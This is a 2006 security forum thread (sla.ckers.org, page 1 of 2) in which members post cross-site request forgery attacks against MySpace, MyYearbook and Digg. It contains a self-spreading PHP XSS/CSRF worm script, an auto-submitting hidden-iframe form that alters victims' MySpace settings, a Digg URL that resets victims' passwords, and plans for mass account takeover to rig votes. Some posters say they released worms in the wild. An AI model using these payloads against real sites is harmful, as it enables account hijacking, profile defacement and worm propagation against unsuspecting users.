Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
CSRF Full Disclosure
Posted by: rsnake
Date: October 17, 2006 04:58PM

If you guys have any CSRF issues you want to post in websites, here's the place.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF Full Disclosure
Date: October 18, 2006 06:34PM

I found a lot on a certain forum service however I was threatened once again by legal action via the service owner. I would however like to try my luck with a CSRF worm, but I'll need help with one portion.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 18, 2006 07:01PM

Welp, ask away. Maybe someone here can lend a hand.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: unsticky
Date: October 19, 2006 02:51AM

I had found a few interesting CSRF vulns, but well... being me and all, I wrote and released worms for the vectors and now they're all patched up. I've still got copies of the php scripts I used for the worms which I could post, if they'd be of interest to anyone.

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 19, 2006 03:35AM

yes, patched or not they're interesting to see .. i'll be happy to see them ^^

-maluc

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 19, 2006 11:00AM

Agreed... as sample code it's worth taking a look at, even if it's partially broken or disabled by the host in question.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: unsticky
Date: October 19, 2006 02:43PM

I've still got code for two of my MyYearbook.com CSRF worms, which I released after I realized the staff that I'd attempted to report my finds to were completely incompetant. The first of the two worms was a little bit more fun than the second, as I'd found you could completely set a user's profile contents via CSRF. Set them to atleast an Image tag pointing back to your PHP script, and ta-da you've got a pleasant profile-defacing worm. The second I only released because the vector I'd found was rather interesting. The injection point was through a custom link in the 'My Links' section of the profiles. The URL feild was not properly sanitized and allowed for Event-based XSS, since all brackets were stripped because of my previous escapades. Combining the onMouseOver event with createElement(), to generate an image tag to access my CRSF script, I created a wonderous MouseOver CRSF worm. I'll only post the code for the MouseOver worm, since the code for both worms is realitivly similar as well as horridly simple, and the XSS of the MouseOver worm would stick more with the XSS theme.

MOW.php:
<?php
$msg="You Sunk My Battleship!";
$myc="\" onmouseover=\"i=document.createElement('img'); i.src='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "';this.innerHTML='" . $msg . "';\" ";
Header("Location: http://" . "www.myyearbook.com/index.php?mysession=cmVnaXN0cmF0aW9uX2FkZGZhdm91cml0ZXNpdGU=&sitename=" . urlencode($myc) . "&sitedesc=" . urlencode($msg) . "&action=1&image.x=39&image.y=13");
?>

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 20, 2006 03:23PM

I guess i'll start it off, with a still live one. Victim must be logged in first.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://settings.myspace.com/user/accountSetting_update.cfm?z=1&preferredCulture=fr-FR&timezone=11 myspace.com

Changes Language to french, and sets their time to match Moscow. For those that don't read french, you can get back to the settings menu here: http://settings.myspace.com/index.cfm?fuseaction=user.accountSetting

Usage:
preferredCulture= (de-DE||en-AU||en-GB||en-IE||en-US||fr-FR)
timezone= (-4...20) 0 is central US time

The rest of their settings menu, aside from change email and change pass, is also probably vulnerable.

-maluc

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 20, 2006 03:46PM

I guess I'll make a myspace account to mess around with.

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Kyran
Date: October 20, 2006 04:27PM

http://collect.myspace.com/index.cfm?fuseaction=signout Works everywhere except for actually on Myspace. They seem to block IMG tags that aren't images.

- Kyran

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 20, 2006 05:27PM

Kyran, I wouldn't really call that CSRF :P.

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 20, 2006 06:26PM

Well it is actually CSRF ^^ .. just mostly useless by itself. If you're combining it with an XSS hole to abuse password managers and grab the plaintext pass, then it's probably useful.

But ya, i doubt most any site will tokenize the logout buttons.

-maluc

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Kyran
Date: October 20, 2006 06:33PM

Ghozt Wrote:
-------------------------------------------------------
> Kyran, I wouldn't really call that CSRF :P.


But it is! I swear! :P


maluc Wrote:
-------------------------------------------------------
> Well it is actually CSRF ^^ .. just mostly useless
> by itself. If you're combining it with an XSS
> hole to abuse password managers and grab the
> plaintext pass, then it's probably useful.
>
> But ya, i doubt most any site will tokenize the
> logout buttons.
>
> -maluc

Yeah. I've been playing around alot with the password manager idea since it was mentioned on the forums, which is why I posted that one.

- Kyran

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Spikeman
Date: October 21, 2006 04:19PM

maluc Wrote:
-------------------------------------------------------
> http://www.whiteacid.org/misc/xss_post_forwarder.p
> hp?xss_target=http://settings.myspace.com/user/acc
> ountSetting_update.cfm?z=1&preferredCulture=fr-FR&
> timezone=11 myspace.com

Since that uses whiteacid's post forwarder, I'm just wondering how exactly you would pull something like this off in the wild? Maybe trick them into another site infected with the form and xss that submit's the form once it's loaded? Or does whiteacid have some sort of tool like this?

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Kyran
Date: October 21, 2006 04:23PM

It requires a bit of social engineering but it shouldnt be hard with Dword obsufucation.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://settings.myspace.com/user/accountSetting_update.cfm?z=1&preferredCulture=fr-FR&timezone=11

Copy + Paste the html below the submit button into a page. Send target to that page.
It will auto-submit.

- Kyran

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 21, 2006 10:24PM

Spikeman Wrote:
-------------------------------------------------------
> Since that uses whiteacid's post forwarder, I'm
> just wondering how exactly you would pull
> something like this off in the wild? Maybe trick
> them into another site infected with the form and
> xss that submit's the form once it's loaded? Or
> does whiteacid have some sort of tool like this?


In the wild, you could just edit WhiteAcids' code to automate it.

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 22, 2006 02:11AM

It uses the POST forwarder because it cannot be sent by GET. So therefore i can't email someone to click the link:
http://settings.myspace.com/user/accountSetting_update.cfm?z=1&preferredCulture=fr-FR&timezone=11

it wouldn't work. However you can send them something like so: 'Hey check out these dancing kittens: http://maluc.sitesled.com/kittendance.html (i'm too lazy to make an actual kitten dancing page, but you get the idea)..

Once they visit your site, or any you can inject html/script into.. You can for example include the following html:
<iframe name="hiddenframe"></iframe>
<form name="autopost" method="post" target="hiddenframe" action="http://settings.myspace.com/user/accountSetting_update.cfm?z=1">
<input type="hidden" name="preferredCulture" value="fr-FR" />
<input type="hidden" name="timezone" value="11" />
</form>
<body onload="autopost.submit()">

Can be done several ways, but this is probably the simplest

-maluc

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 22, 2006 02:18AM

and to make the iframe actually hidden, add in the attribute:
style="visibility:hidden;height:0;width:0"

But while it's unhidden, you can see that it actually autosubmits and shows myspace inside the frame window

-malcu

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: kirke
Date: October 22, 2006 03:21PM

> It uses the POST forwarder because it cannot be sent by GET. So therefore i can't email someone to click the link:

there're a lot of ways to do it by email, just a few examples:
- link to other side as already said
- embedded pdf
- embedded flash
- embedded active scripting(JavaScript, ActiveX, java) if the MUA is too stupid

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 22, 2006 03:38PM

Another example: .html file renamed to .doc with a link header, a la the webbug: http://ha.ckers.org/webbug.html

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 23, 2006 06:05PM

I don't actually have a working example for this, just a heads up for IE7 users. If you find an XSS hole on a microsoft domain..
 javascript:window.external.customizesettings(false,false,'is-is')
will disable the victims anonymous usage statistics, disable the anti-phishing toolbar, and change their default language to icelandic.

the stipulation is that it has to execute from a microsoft domain..

-maluc

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 30, 2006 05:51PM

Digg - http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://digg.com/profileedit/$user?name=&location=&im_type=aim&im_name=&homepage=&email=$email&password1=$password&password2=$password&process=1

Replace:
$user
$email
$password

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 30, 2006 09:05PM

At least you have to know their email address. Not that that's hard or anything but still. Nice find.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 30, 2006 09:14PM

rsnake Wrote:
-------------------------------------------------------
> At least you have to know their email address.
> Not that that's hard or anything but still. Nice
> find.


No you don't, it can be random.
I reported it to abuse@digg.com earlier, I don't think he knew what I was talking about. I explained it more in the second email, though.

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 30, 2006 10:01PM

So the only thing that's required to be valid is the username and the password you want to set it to?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: Ghozt
Date: October 30, 2006 10:03PM

Yep.

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 30, 2006 10:48PM

well they have to make the request, not you obviously.. but this can still be automated, by finding an XSS hole in digg.com to pull their username from when they visit evil.com. or using mhtml..

Throw it on a page, and digg it yourself. Change anyones digg password who visits it to Haxxed. Then automate logging in as them and digging your own story. Which will bring more digg people ^^. Good way to get alot of visitors in a hurry.. and be able to digg any number of other websites with those accounts. Not very covert though.. but effective.

-maluc

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 31, 2006 10:07AM

Covert CSRF and XSS is a whole other topic and one I am sure I can help with if it ever needs to happen, but yes, I can see why this would work in either case. Without knowing the username though you can't really do much with this as a remote CSRF, so it would have to use XSS to read the username off the page somewhere or some other place that has access to the username. Still cool though.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: maluc
Date: October 31, 2006 12:58PM

well there is an XSS hole on digg, and took all of two minutes to find - so i'm sure you guys can find it as well. but really, with an XSS hole any form/command on every site is CSRFable as long as it's not captchad

That being said, i was gunna ask a question about captchas but i'll move it to the captcha forum.. so, go there --> http://sla.ckers.org/forum/read.php?7,2298

-maluc



Edited 1 time(s). Last edit at 10/31/2006 01:41PM by maluc.

Options: ReplyQuote
Re: CSRF Full Disclosure
Posted by: rsnake
Date: October 31, 2006 08:14PM

maluc, you're a bad boy and your mother should spank you. That said, I can't wait for when you go public with whatever you have in mind. :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.